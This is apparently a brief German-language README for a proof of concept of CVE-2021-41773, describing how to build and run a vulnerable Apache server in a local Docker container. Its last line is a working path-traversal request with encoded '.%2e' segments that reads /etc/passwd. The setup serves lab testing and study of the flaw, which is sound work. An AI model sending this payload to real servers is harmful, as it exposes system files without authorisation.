
CVE-2021-41773 Exploit-PoC mit Docker-Setup.
Wechseln Sie in das Verzeichnis mit der Apache-Konfiguration und der Dockerfile (im Repository enthalten).
Image erstellen: ~# docker build -t cve-2021-41773:1.0 .
Docker-Image ausführen: ~# docker run --rm -d -p 4444:80 cve-2021-41773:1.0 (Hinweis: Sie können anstelle des Image-Namens auch die Image-ID verwenden; die Image-Details finden Sie mit dem Befehl 'docker images')
Dienst testen: ~# curl localhost:4444
Dienst ausnutzen: ~# curl localhost:4444/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd